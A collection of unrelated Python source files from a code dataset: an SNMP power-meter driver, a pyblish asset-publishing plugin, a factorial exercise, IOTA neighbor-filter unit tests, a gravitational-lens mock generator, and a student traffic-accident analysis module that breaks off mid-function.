CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport time\n\nfrom pysnmp.entity.rfc3413.oneliner import cmdgen\n\nfrom kwapi.utils import log\nfrom driver import Driver\n\nLOG = log.getLogger(__name__)\n\nclass Snmp(Driver):\n \"\"\"Driver for SNMP based PDUs.\"\"\"\n\n def __init__(self, probe_ids, probes_names, probe_data_type, **kwargs):\n \"\"\"Initializes the SNMP driver.\n\n Keyword arguments:\n probe_ids -- list containing the probes IDs\n (a metricmeter monitor sometimes several probes)\n kwargs -- keyword (protocol, user or community, ip, oid) defining the\n SNMP parameters\n Eaton OID is 1.3.6.1.4.1.534.6.6.7.6.5.1.3\n Raritan OID is 1.3.6.1.4.1.13742.4.1.2.2.1.7\n\n \"\"\"\n Driver.__init__(self, probe_ids, probes_names, probe_data_type, kwargs)\n self.cmd_gen = cmdgen.CommandGenerator()\n\n def work(self):\n \"\"\"driver process main work.\"\"\"\n while not self.stop_request_pending():\n try:\n req_time = time.time()\n measure_time = time.time()\n metrics_list = self.get_metrics()\n #Sum duplicate probes metrics in a specific dictionnary\n agg_values = {}\n if metrics_list is not None:\n for i, metrics in enumerate(metrics_list):\n probe = self.probe_ids[i]\n if not probe:\n continue\n # probe_data_type = {'name':'switch.port.receive.bytes',\n # 'type':'Cummulative',\n # 'unit':'B'}\n if self.probe_data_type['type'] == 'Gauge':\n if not probe in agg_values:\n agg_values[probe] = 0\n agg_values[probe] += metrics\n else:\n measurements = self.create_measurements(probe,\n measure_time,\n metrics)\n self.send_measurements(probe, measurements)\n #Send each sum of probe\n for probe, agg_value in agg_values.items():\n measurements = self.create_measurements(probe,\n measure_time,\n agg_value)\n self.send_measurements(probe, measurements)\n time.sleep(max(0, self.kwargs.get('resolution', 1)-(time.time()-req_time)))\n except Exception as e:\n LOG.error(\"Exception in SNMP process: %s\" % e)\n\n def get_metrics(self):\n \"\"\"Returns the OID field.\"\"\"\n protocol = self.kwargs.get('protocol')\n if protocol == '1':\n community_or_user = cmdgen.CommunityData(\n self.kwargs.get('community'),\n mpModel=0)\n elif protocol == '2c':\n community_or_user = cmdgen.CommunityData(\n self.kwargs.get('community'),\n mpModel=1)\n elif protocol == '3':\n community_or_user = cmdgen.UsmUserData(self.kwargs.get('user'))\n errorIndication, errorStatus, errorIndex, varBindTable = \\\n self.cmd_gen.bulkCmd(\n community_or_user,\n cmdgen.UdpTransportTarget((self.kwargs.get('ip'), 161)),\n 1, 0,\n self.kwargs.get('oid'),\n maxRows=len(self.probe_ids),\n )\n\n if errorIndication:\n LOG.error(errorIndication)\n LOG.error(\"Request: %s\\t%s\\t%s\\t%s\" \n % (self.kwargs.get('user'), self.kwargs.get('ip'),\n self.kwargs.get('oid'), self.probe_ids[0]))\n return None\n else:\n if errorStatus:\n LOG.error('%s at %s' % (\n errorStatus.prettyPrint(),\n errorIndex and varBindTable[-1][int(errorIndex) - 1] or '?'\n ))\n return None\n else:\n outlet_list = []\n for varBindTableRow in varBindTable:\n for name, value in varBindTableRow:\n outlet_list.append(int(value))\n return outlet_list\n\n","sub_path":"kwapi/drivers/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63839459","text":"import pyblish.api\n\n\nclass IntegrateMindbenderAsset(pyblish.api.InstancePlugin):\n \"\"\"Write to files and metadata\n\n This plug-in exposes your data to others by encapsulating it\n into a new version.\n\n Schema:\n Data is written in the following format.\n ____________________\n | |\n | version |\n | ________________ |\n | | | |\n | | representation | |\n | |________________| |\n | | | |\n | | ... | |\n | |________________| |\n |____________________|\n\n \"\"\"\n\n label = \"Integrate Mindbender Asset\"\n order = pyblish.api.IntegratorOrder\n families = [\n \"mindbender.model\",\n \"mindbender.rig\",\n \"mindbender.animation\",\n \"mindbender.lookdev\",\n \"mindbender.historyLookdev\",\n ]\n\n def process(self, instance):\n import os\n import errno\n import shutil\n from pprint import pformat\n\n from mindbender import api, io\n\n assert all(os.getenv(env) for env in (\n \"MINDBENDER__ASSET\", \"MINDBENDER__PROJECT\")), (\n \"Missing environment variables\\n\"\n \"This can sometimes happen when an application was launched \\n\"\n \"manually, outside of the pipeline.\"\n )\n\n context = instance.context\n\n # Atomicity\n #\n # Guarantee atomic publishes - each asset contains\n # an identical set of members.\n # __\n # / o\n # / \\\n # | o |\n # \\ /\n # o __/\n #\n assert all(result[\"success\"] for result in context.data[\"results\"]), (\n \"Atomicity not held, aborting.\")\n\n # Assemble\n #\n # |\n # v\n # ---> <----\n # ^\n # |\n #\n stagingdir = instance.data.get(\"stagingDir\")\n assert stagingdir, (\n \"Incomplete instance \\\"%s\\\": \"\n \"Missing reference to staging area.\"\n % instance\n )\n\n self.log.debug(\"Establishing staging directory @ %s\" % stagingdir)\n\n project = io.find_one({\n \"_id\": io.ObjectId(os.environ[\"MINDBENDER__PROJECT\"])\n })\n\n asset = io.find_one({\n \"_id\": io.ObjectId(os.environ[\"MINDBENDER__ASSET\"])\n })\n\n assert all([project, asset]), \"This is bug\"\n\n subset = io.find_one({\n \"type\": \"subset\",\n \"parent\": asset[\"_id\"],\n \"name\": instance.data[\"subset\"]\n })\n\n if subset is None:\n self.log.info(\"Subset '%s' not found, creating..\"\n % instance.data[\"subset\"])\n\n _id = io.insert_one({\n \"schema\": \"mindbender-core:subset-2.0\",\n \"type\": \"subset\",\n \"name\": instance.data[\"subset\"],\n \"data\": {},\n \"parent\": asset[\"_id\"]\n }).inserted_id\n\n subset = io.find_one({\"_id\": _id})\n\n all_versions = [0] + [\n version[\"name\"]\n for version in io.find({\n \"type\": \"version\",\n \"parent\": subset[\"_id\"]\n }, {\"name\": True})\n ]\n\n next_version = sorted(all_versions)[-1] + 1\n\n # versiondir = template_versions.format(**template_data)\n self.log.debug(\"Next version: %i\" % next_version)\n\n version = {\n \"schema\": \"mindbender-core:version-2.0\",\n \"type\": \"version\",\n \"parent\": subset[\"_id\"],\n \"name\": next_version,\n\n \"data\": {\n # Used to identify family of assets already on disk\n \"families\": instance.data.get(\"families\", list()) + [\n instance.data.get(\"family\")\n ],\n\n \"time\": context.data[\"time\"],\n \"author\": context.data[\"user\"],\n\n \"source\": os.path.join(\n \"{root}\",\n os.path.relpath(\n context.data[\"currentFile\"],\n api.registered_root()\n )\n ).replace(\"\\\\\", \"/\"),\n }\n }\n\n self.backwards_compatiblity(instance, version)\n\n self.log.debug(\"Creating version: %s\" % pformat(version))\n version_id = io.insert_one(version).inserted_id\n\n # Write to disk\n # _\n # | |\n # _| |_\n # ____\\ /\n # |\\ \\ / \\\n # \\ \\ v \\\n # \\ \\________.\n # \\|________|\n #\n template_data = {\n \"root\": api.registered_root(),\n \"project\": os.environ[\"MINDBENDER_PROJECT\"],\n \"silo\": os.environ[\"MINDBENDER_SILO\"],\n \"asset\": os.environ[\"MINDBENDER_ASSET\"],\n \"subset\": subset[\"name\"],\n \"version\": version[\"name\"],\n }\n\n template_publish = project[\"config\"][\"template\"][\"publish\"]\n\n for fname in os.listdir(stagingdir):\n name, ext = os.path.splitext(fname)\n template_data[\"representation\"] = ext[1:]\n\n src = os.path.join(stagingdir, fname)\n dst = template_publish.format(**template_data)\n\n # Backwards compatibility\n if fname == \".metadata.json\":\n dirname = os.path.dirname(dst)\n dst = os.path.join(dirname, \".metadata.json\")\n\n self.log.info(\"Copying %s -> %s\" % (src, dst))\n\n dirname = os.path.dirname(dst)\n try:\n os.makedirs(dirname)\n except OSError as e:\n if e.errno == errno.EEXIST:\n pass\n else:\n self.log.critical(\"An unexpected error occurred.\")\n raise\n\n shutil.copy(src, dst)\n\n representation = {\n \"schema\": \"mindbender-core:representation-2.0\",\n \"type\": \"representation\",\n \"parent\": version_id,\n \"name\": ext[1:],\n \"data\": {\n \"label\": {\n \".ma\": \"Maya Ascii\",\n \".source\": \"Original source file\",\n \".abc\": \"Alembic\"\n }.get(ext)\n }\n }\n\n io.insert_one(representation)\n\n self.log.info(\"Successfully integrated \\\"%s\\\" to \\\"%s\\\"\" % (\n instance, dst))\n\n def backwards_compatiblity(self, instance, version):\n \"\"\"Maintain backwards compatibility with newly published assets\n\n With the introduction of the database in 2.0, the artist would be\n unable to publish in 2.0 and use the files in 1.0. Therefore, we\n introduce this mechanism which continue to write for 1.0 even\n when writing from the 2.0 pipeline.\n\n This behaviour is deprecated and is to be removed in a future release.\n\n \"\"\"\n\n import os\n import json\n import errno\n from mindbender import api\n\n context = instance.context\n\n # Metadata\n # _________\n # | |.key = value\n # | |\n # | |\n # | |\n # | |\n # |_________|\n #\n stagingdir = instance.data.get(\"stagingDir\")\n fname = os.path.join(stagingdir, \".metadata.json\")\n\n root = os.environ[\"MINDBENDER_ASSETPATH\"]\n instancedir = os.path.join(root, \"publish\", instance.data[\"subset\"])\n\n try:\n os.makedirs(instancedir)\n except OSError as e:\n if e.errno != errno.EEXIST: # Already exists\n self.log.critical(\"An unexpected error occurred.\")\n raise\n\n latest_version = api.find_latest_version(os.listdir(instancedir)) + 1\n versiondir = os.path.join(\n instancedir,\n api.format_version(latest_version)\n )\n\n try:\n with open(fname) as f:\n version_1_0 = json.load(f)\n\n except IOError:\n version_1_0 = dict(version, **{\n \"schema\": \"mindbender-core:version-1.0\",\n\n # Hard-coded during transition\n \"path\": versiondir.replace(\"\\\\\", \"/\"),\n \"representations\": list(),\n\n \"version\": version[\"name\"],\n\n # Used to identify family of assets already on disk\n \"families\": instance.data.get(\"families\", list()) + [\n instance.data.get(\"family\")\n ],\n\n \"time\": context.data[\"time\"],\n \"author\": context.data[\"user\"],\n\n # Record within which silo this asset was made.\n \"silo\": os.environ[\"MINDBENDER_SILO\"],\n\n # Collected by pyblish-maya\n \"source\": os.path.join(\n \"{root}\",\n os.path.relpath(\n context.data[\"currentFile\"],\n os.path.join(\n api.registered_root(),\n os.environ[\"MINDBENDER_PROJECT\"]\n )\n )\n ).replace(\"\\\\\", \"/\"),\n\n # Discard database keys\n \"parent\": None,\n })\n\n for filename in instance.data.get(\"files\", list()):\n name, ext = os.path.splitext(filename)\n version_1_0[\"representations\"].append(\n {\n \"schema\": \"mindbender-core:representation-1.0\",\n \"format\": ext,\n \"path\": os.path.join(\n \"{dirname}\",\n \"%s{format}\" % name,\n ).replace(\"\\\\\", \"/\")\n }\n )\n\n # Write to disk\n # _\n # | |\n # _| |_\n # ____\\ /\n # |\\ \\ / \\\n # \\ \\ v \\\n # \\ \\________.\n # \\|________|\n #\n with open(fname, \"w\") as f:\n json.dump(version_1_0, f, indent=4)\n\n self.log.info(\"Successfully wrote %s.\" % fname)\n","sub_path":"mindbender/plugins/integrate_asset.py","file_name":"integrate_asset.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123195273","text":"import sys\n\ndef factoriel(n):\n if ( n > 1 ):\n return n * factoriel(n-1)\n else:\n return 1\n\ndef main(arg):\n print(\"Le factoriel de \" + str(arg) + \" est \" + str(factoriel(arg)) + \".\")\n\nif __name__ == \"__main__\":\n arg = sys.argv[1]\n main(int(arg))\n","sub_path":"chapitre1/exercice.1.2.1/factoriel.py","file_name":"factoriel.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"473737326","text":"from unittest import TestCase\n\nimport filters as f\nfrom filters.test import BaseFilterTestCase\nfrom iota import Iota, AsyncIota\nfrom iota.adapter import MockAdapter, async_return\nfrom iota.commands.core.add_neighbors import AddNeighborsCommand\nfrom iota.filters import NodeUri\nfrom test import patch, MagicMock, async_test\n\n\nclass AddNeighborsRequestFilterTestCase(BaseFilterTestCase):\n filter_type = AddNeighborsCommand(MockAdapter()).get_request_filter\n skip_value_check = True\n\n def test_pass_valid_request(self):\n \"\"\"\n The incoming request is valid.\n \"\"\"\n request = {\n 'uris': [\n 'udp://node1.iotatoken.com',\n 'udp://localhost:14265/',\n ],\n }\n\n filter_ = self._filter(request)\n\n self.assertFilterPasses(filter_)\n self.assertDictEqual(filter_.cleaned_data, request)\n\n def test_fail_empty(self):\n \"\"\"\n The incoming request is empty.\n \"\"\"\n self.assertFilterErrors(\n {},\n\n {\n 'uris': [f.FilterMapper.CODE_MISSING_KEY],\n },\n )\n\n def test_fail_unexpected_parameters(self):\n \"\"\"\n The incoming request contains unexpected parameters.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': ['udp://localhost'],\n\n # I've never seen that before in my life, officer.\n 'foo': 'bar',\n },\n\n {\n 'foo': [f.FilterMapper.CODE_EXTRA_KEY],\n },\n )\n\n def test_fail_neighbors_null(self):\n \"\"\"\n ``uris`` is null.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': None,\n },\n\n {\n 'uris': [f.Required.CODE_EMPTY],\n },\n )\n\n def test_fail_uris_wrong_type(self):\n \"\"\"\n ``uris`` is not an array.\n \"\"\"\n self.assertFilterErrors(\n {\n # Nope; it's gotta be an array, even if you only want to add\n # a single neighbor.\n 'uris': 'udp://localhost:8080/'\n },\n\n {\n 'uris': [f.Type.CODE_WRONG_TYPE]\n },\n )\n\n def test_fail_uris_empty(self):\n \"\"\"\n ``uris`` is an array, but it's empty.\n \"\"\"\n self.assertFilterErrors(\n {\n # Insert \"Forever Alone\" meme here.\n 'uris': [],\n },\n\n {\n 'uris': [f.Required.CODE_EMPTY],\n },\n )\n\n def test_fail_uris_contents_invalid(self):\n \"\"\"\n ``uris`` is an array, but it contains invalid values.\n \"\"\"\n self.assertFilterErrors(\n {\n 'uris': [\n '',\n False,\n None,\n b'udp://localhost:8080/',\n 'not a valid uri',\n\n # This is actually valid; I just added it to make sure the\n # filter isn't cheating!\n 'udp://localhost:14265',\n\n # Only UDP URIs are allowed.\n 'http://localhost:14265',\n\n 2130706433,\n ],\n },\n\n {\n 'uris.0': [f.Required.CODE_EMPTY],\n 'uris.1': [f.Type.CODE_WRONG_TYPE],\n 'uris.2': [f.Required.CODE_EMPTY],\n 'uris.3': [f.Type.CODE_WRONG_TYPE],\n 'uris.4': [NodeUri.CODE_NOT_NODE_URI],\n 'uris.6': [NodeUri.CODE_NOT_NODE_URI],\n 'uris.7': [f.Type.CODE_WRONG_TYPE],\n },\n )\n\n\nclass AddNeighborsCommandTestCase(TestCase):\n def setUp(self):\n super(AddNeighborsCommandTestCase, self).setUp()\n\n self.adapter = MockAdapter()\n\n def test_wireup(self):\n \"\"\"\n Verify that the command is wired up correctly. (sync)\n\n The API method indeed calls the appropiate command.\n \"\"\"\n with patch('iota.commands.core.add_neighbors.AddNeighborsCommand.__call__',\n MagicMock(return_value=async_return('You found me!'))\n ) as mocked_command:\n\n api = Iota(self.adapter)\n\n response = api.add_neighbors('test_uri')\n\n self.assertTrue(mocked_command.called)\n\n self.assertEqual(\n response,\n 'You found me!'\n )\n\n @async_test\n async def test_wireup_async(self):\n \"\"\"\n Verify that the command is wired up correctly. (async)\n\n The API method indeed calls the appropiate command.\n \"\"\"\n with patch('iota.commands.core.add_neighbors.AddNeighborsCommand.__call__',\n MagicMock(return_value=async_return('You found me!'))\n ) as mocked_command:\n\n api = AsyncIota(self.adapter)\n\n response = await api.add_neighbors('test_uri')\n\n self.assertTrue(mocked_command.called)\n\n self.assertEqual(\n response,\n 'You found me!'\n )","sub_path":"test/commands/core/add_neighbors_test.py","file_name":"add_neighbors_test.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"634575757","text":"import lens_models\nimport numpy as np\nfrom allZeTools import statistics\nimport pickle\nfrom sonnentools.cgsconstants import *\nfrom scipy.interpolate import splrep, splev\nfrom scipy.stats import truncnorm\nfrom spherical_jeans import sigma_model\nfrom spherical_jeans.tracer_profiles import deVaucouleurs\nfrom spherical_jeans.mass_profiles import nfw, sersic\n\n\nmockname = 'mockO2019'\n\nday = 24.*3600.\n\nnlens=100\n\nmstar_mu=11.4\nmstar_sig=0.1\n\nmhalo_mu=13.2\nmhalo_sig=0.3\nmstar_mhalo=0.7\nmhalo_piv = 13.2\n\ncvir_sig=0.1\ncvir_mu=0.877\ncvir_beta=-0.094\n\naimf_mu=0.\naimf_sig=0.05\n\nlogreff_mu=0.46\nlogreff_sig = 0.16\n\nmstar_err=0.1\nradmagrat_err=0.020\nimerr=0.01\ndt_err=1.\n\nsigma_err = 10.\n\nmax_asymm = 0.2\n\nh=0.7\n\nngrid = 31\nrs2reff_grid = np.logspace(-1., 2., ngrid)\nnfw_s2_grid = 0.*rs2reff_grid\nnr = 1001\nr_grid = np.logspace(-3., 3., nr)\nfor i in range(ngrid):\n norm = 1./nfw.M3d(1., rs2reff_grid[i])\n s2_here = sigma_model.sigma2((r_grid, norm*nfw.M3d(r_grid, rs2reff_grid[i])), 0.5, 1., light_profile=deVaucouleurs)\n nfw_s2_grid[i] = s2_here * G * M_Sun / kpc / 1e10\n\nnfw_re2_s2_spline = splrep(rs2reff_grid, nfw_s2_grid)\n\ndeV_M3d_spline = sersic.get_m3d_spline(4., 1.)\ndeV_re2_s2 = sigma_model.sigma2((r_grid, splev(r_grid, deV_M3d_spline)), 0.5, 1., deVaucouleurs) * G * M_Sun / kpc / 1e10\n\n# redshift distribution of lenses: uniform between 0.1 and 0.3 (hardcoded)\nzds = np.random.rand(nlens)*0.2+0.2\n\n# redshift distribution of sources: some sort of truncated exponential... (hardcoded)\nzs_min = 0.7\nzs_max = 4.\nzs_mu = 1.5\nzs_sig = 0.5\na, b = (zs_min - zs_mu)/zs_sig, (zs_max - zs_mu)/zs_sig\nzss = truncnorm.rvs(a, b, size=nlens)*zs_sig + zs_mu\n\n# distribution of halo masses: Gaussian\nmhalos = mhalo_mu + np.random.normal(0., mhalo_sig, nlens)\n\n# distribution of stellar masses: power-law dependence on halo mass + scatter\nmstars = mstar_mu + mstar_mhalo*(mhalos - mhalo_piv) + np.random.normal(0., mstar_sig, nlens)\n\n# distribution of stellar IMF: Gaussian\naimfs = np.random.normal(aimf_mu, aimf_sig, nlens)\n\n# SED-fitting stellar masses\nmstars_sps = mstars - aimfs\n\n# observed SED-fitting stellar masses\nmstars_meas = mstars_sps + np.random.normal(0., mstar_err, nlens)\n\n# percentage uncertainties on observed radial magnification ratio\nradmagrat_errs = np.random.normal(0., radmagrat_err, nlens)\n\n# distribution in concentration: using Mass-concentration relation form Maccio et al. 2008 + scatter\nlogcvirs = cvir_mu + cvir_beta*(mhalos-13.) + np.random.normal(0., cvir_sig, nlens)\n\n# distribution in effective radii: power-law dependence on stellar mass and redshift plus scatter\nlogreffs = logreff_mu + 0.59*(mstars - 11.) - 0.26*(zds - 0.7) + np.random.normal(0., logreff_sig, nlens)\nreffs = 10.**logreffs\n\n# calculates central velocity dispersion\nsigma_sample = np.zeros(nlens)\nsigma_obs = np.zeros(nlens)\nsigma_dev = np.random.normal(0., sigma_err, nlens)\n\nhyperpars = {'h': h, 'mstar_mu': mstar_mu, 'mstar_sig': mstar_sig, 'mhalo_mu': mhalo_mu, 'mhalo_sig': mhalo_sig, \\\n 'mstar_mhalo': mstar_mhalo, 'cvir_mu': cvir_mu, 'cvir_beta': cvir_beta, 'cvir_sig': cvir_sig, \\\n 'aimf_mu': aimf_mu, 'aimf_sig': aimf_sig, 'logreff_mu': logreff_mu, 'mstar_err': mstar_err, \\\n 'radmagrat_err': radmagrat_err, 'imerr': imerr, 'dt_err': dt_err}\n\noutput = {'truth': hyperpars, 'mhalo_sample': mhalos, 'mstar_sample': mstars, 'msps_sample': mstars_sps, \\\n 'aimf_sample': aimfs, 'msps_obs_sample': mstars_meas, 'reff_sample': reffs, 'logcvir_sample': logcvirs, \\\n 'zd_sample': zds, 'zs_sample': zss}\n\nlenses = []\nfor i in range(nlens):\n lens = lens_models.NfwDev(zd=zds[i], zs=zss[i], mstar=10.**mstars[i], mhalo=10.**mhalos[i], \\\n reff_phys=reffs[i], cvir=10.**logcvirs[i], h=h, delta_halo=200.)\n\n lens.normalize()\n lens.get_rein()\n lens.get_caustic()\n\n m200tomrs = (np.log(2.) - 0.5)/(np.log(1. + lens.cvir) - lens.cvir/(1. + lens.cvir))\n\n s2_halo = lens.mhalo * m200tomrs*splev(lens.rs/lens.reff, nfw_re2_s2_spline)/reffs[i]\n s2_bulge = lens.mstar * deV_re2_s2 / reffs[i]\n\n sigma_sample[i] = (s2_halo + s2_bulge)**0.5\n\n lens.obs_sigma = (sigma_sample[i] + sigma_dev[i], sigma_err)\n sigma_obs[i] = lens.obs_sigma[0]\n\n ymax = lens.rein * (1. + max_asymm) - lens.alpha(lens.rein * (1. + max_asymm))\n\n # source position: uniform distribution in a circle\n ysource = (np.random.rand(1))**0.5*ymax\n\n lens.source = ysource\n lens.get_images()\n lens.get_radmag_ratio()\n lens.get_timedelay()\n\n imerrs = np.random.normal(0., imerr, 2)\n lens.obs_images = ((lens.images[0] + imerrs[0], lens.images[1] + imerrs[1]), imerr)\n lens.obs_lmstar = (mstars_meas[i], mstar_err)\n lens.obs_radmagrat = (lens.radmag_ratio + radmagrat_errs[i], radmagrat_err)\n lens.obs_timedelay = (lens.timedelay + day*np.random.normal(0., dt_err, 1), dt_err*day)\n\n if lens.images is None:\n df\n\n lenses.append(lens)\n\noutput['sigma_sample'] = sigma_sample\noutput['sigma_obs'] = sigma_obs\noutput['sigma_err'] = sigma_err\n\noutput['lenses'] = lenses\n\nf = open('%s.dat'%mockname, 'wb')\npickle.dump(output, f)\nf.close()\n\n","sub_path":"paper/make_mock.py","file_name":"make_mock.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"96214831","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación\n * Universidad de Los Andes\n *\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n \"\"\"\nimport config\nfrom DISClib.ADT import list as lt\nfrom DISClib.ADT import orderedmap as om\nfrom DISClib.DataStructures import mapentry as me\nfrom DISClib.ADT import map as m\nimport datetime\nassert config\n\n\"\"\"\nEn este archivo definimos los TADs que vamos a usar,\nes decir contiene los modelos con los datos en memoria\n\n\n\"\"\"\n\n# -----------------------------------------------------\n# API del TAD Catalogo de accidentes\n# -----------------------------------------------------\n\ndef newCatalog_1():\n \"\"\" Inicializa el catálogo y\n retorna el catálogo inicializado\n \"\"\"\n catalog = {'accidents': None,\n \"2016\": None,\n \"2017\": None,\n \"2018\": None,\n \"2019\": None,\n \"2020\": None\n }\n\n catalog[\"accidents\"] = lt.newList(\"ARRAY_LIST\",compareAccidentsId)\n catalog[\"2016\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n catalog[\"2017\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n catalog[\"2018\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final) \n catalog[\"2019\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final)\n catalog[\"2020\"] = om.newMap(omaptype=\"BST\",comparefunction=CompareDates_Final)\n \n return catalog\ndef newCatalog():\n \"\"\" Inicializa el catálogo y\n retorna el catálogo inicializado\n \"\"\"\n catalog = {'accidents': None,\n \"2016\": None,\n \"2017\": None,\n \"2018\": None,\n \"2019\": None,\n \"2020\": None\n }\n\n catalog[\"accidents\"] = lt.newList(\"ARRAY_LIST\",compareAccidentsId)\n catalog[\"2016\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final) \n catalog[\"2017\"] = om.newMap(omaptype=\"RTB\",comparefunction=CompareDates_Final) \n catalog[\"2018\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final) \n catalog[\"2019\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final)\n catalog[\"2020\"] = om.newMap(omaptype=\"RBT\",comparefunction=CompareDates_Final)\n \n return catalog\n# Funciones para agregar informacion al catalogo\n\ndef addAccident(catalog,accident):\n \"\"\"\n Adiciona un accidente a la lista de accidentes\n \"\"\" \n occurred_start_date = accident[\"Start_Time\"]\n accident_date = datetime.datetime.strptime(occurred_start_date, \"%Y-%m-%d %H:%M:%S\")\n ocurred_year = str(accident_date.year) \n lt.addLast(catalog[\"accidents\"],accident)\n uptadeAccidentInDate(catalog[ocurred_year],accident) \n return catalog \n\ndef newDateEntry():\n \"\"\"\n Se crea un nodo dada una fecha con sus respectivas llaves\n \"\"\"\n entry = {\"Severities_mp\": None, \"Accidents_lst\": None}\n entry[\"Severities_mp\"] = m.newMap(numelements=15,maptype=\"PROBING\",comparefunction=CompareSeverity_prueba)\n entry[\"Accidents_lst\"] = lt.newList(\"SINGLE_LINKED\", CompareDates_Final)\n return entry\n\ndef newSeverityEntry(accident):\n \"\"\"\n Se crea el grado de gravedad (severity) \n \"\"\"\n severity_entry = {\"Severity\": None, \"ListBySeverity\": None}\n severity_entry[\"Severity\"] = accident[\"Severity\"]\n severity_entry[\"ListBySeverity\"] = lt.newList(\"SINGLE_LINKED\", CompareSeverity_prueba)\n return severity_entry\n\ndef uptadeAccidentInDate(year_map,accident):\n \"\"\"\n Se busca si existe la fecha del accidente, de no hacerlo la crea\n \"\"\"\n ocurred_date = accident[\"Start_Time\"]\n accident_date = datetime.datetime.strptime(ocurred_date, \"%Y-%m-%d %H:%M:%S\")\n entry = om.get(year_map,accident_date.date())\n\n if entry is None:\n date_entry = newDateEntry()\n \n om.put(year_map,accident_date.date(),date_entry) \n else:\n date_entry = me.getValue(entry)\n \n addSeverityToDateEntry(date_entry,accident)\n return year_map\n\ndef addSeverityToDateEntry(date_entry,accident):\n \"\"\"\n Actualiza el grado de severidad.\n \"\"\"\n lt.addLast(date_entry[\"Accidents_lst\"],accident)\n severity = accident[\"Severity\"]\n entry = m.get(date_entry[\"Severities_mp\"], severity)\n\n if entry != None:\n\n severity_entry = me.getValue(entry)\n lt.addLast(severity_entry[\"ListBySeverity\"],accident)\n\n else:\n severity_entry = newSeverityEntry(accident)\n lt.addLast(severity_entry[\"ListBySeverity\"],accident)\n m.put(date_entry[\"Severities_mp\"] , severity, severity_entry)\n \n \n return date_entry\n\n# ==============================\n# Funciones de consulta\n# ==============================\n\ndef getAccidentsByDate(year_bst,search_date):\n \"\"\"\n Reto3 - Req1\n Retorna el número de accidentes ocurridos en una fecha\n \"\"\" \n\n Accidents_Date = om.get(year_bst,search_date)\n\n if Accidents_Date[\"key\"] is not None:\n return me.getValue(Accidents_Date)\n \n return None\n\ndef getAccidentsBeforeDate(year_RBT,search_date):\n \"\"\"\n Reto3 - Req2\n Retorna el número de accidentes ocurridos anteriores a una fecha\n \"\"\" \n Accidents_Date = om.get(year_RBT,search_date)\n \n if Accidents_Date != None:\n\n key_date = Accidents_Date[\"key\"]\n keylow = om.minKey(year_RBT)\n\n return om.keys(year_RBT,keylow,key_date)\n return None\n\ndef getAccidentsInRange(catalog,initial_date,final_date):\n \"\"\"\n Reto3 - Req3\n Retorna el número de accidentes ocurridos en un rango de fechas\n \"\"\" \n initial_year = str(initial_date.year)\n final_year = str(final_date.year) \n \n if initial_date == None and final_date == None:\n print(\"La fecha ingresada es errónea\")\n else:\n\n if initial_year == final_year:\n \n keylow = om.get(catalog[initial_year],initial_date)[\"key\"]\n keyhigh = om.get(catalog[initial_year],final_date)[\"key\"]\n \n return 0 , om.values(catalog[initial_year],keylow,keyhigh)\n else:\n\n keymax = om.maxKey(catalog[initial_year])\n dates_initial_year = om.values(catalog[initial_year],initial_date,keymax)\n\n keymin = om.minKey(catalog[final_year])\n dates_final_year = om.values(catalog[final_year],final_date,keymin)\n return 1 , dates_initial_year , dates_final_year\n\n return None\n\ndef auxiliardelaauxiliar(catalog,initial_date,final_date):\n \"\"\"\n Retorna una tupla dependiendo si el rango abarca uno o dos años\n \"\"\" \n initial_year = str(initial_date.year)\n final_year = str(final_date.year) \n \n initial_date_accidents = om.contains(catalog[initial_year],initial_date)\n final_date_accidents = om.contains(catalog[final_year],final_date)\n\n i=0\n \n if i==0 and initial_date_accidents and final_date_accidents:\n \n if initial_year == final_year: \n\n keylow = om.get(catalog[initial_year],initial_date)[\"key\"]\n keyhigh = om.get(catalog[initial_year],final_date)[\"key\"]\n \n return 0 , om.keys(catalog[initial_year],keylow,keyhigh)\n\n else: \n\n keymax = om.maxKey(catalog[initial_year])\n dates_initial_year = om.keys(catalog[initial_year],initial_date,keymax)\n\n keymin = om.minKey(catalog[final_year])\n dates_final_year = om.keys(catalog[final_year],final_date,keymin)\n return 1 , dates_initial_year , dates_final_year\n\n return None\n\ndef Impresoradatosreq4(catalog,initial_date,final_date,accidents_in_range,criteria):\n \"\"\"\n Reto3 - Req4\n \"\"\"\n dictionary = {}\n i = 1\n \n if accidents_in_range[0] == 0 and accidents_in_range[1] != None: \n condition = 2\n elif accidents_in_range[0] == 1 and accidents_in_range[1] != None: \n condition = 3\n \n while i < condition:\n more_accidents = 0\n num_accidents_in_range = 0\n\n iterator = it.newIterator(accidents_in_range[1])\n while it.hasNext(iterator):\n\n Key_Entry = it.next(iterator) \n day = om.get(catalog[str(Key_Entry.year)],Key_Entry)\n day_accidents = day[\"value\"][\"Accidents_lst\"]\n\n 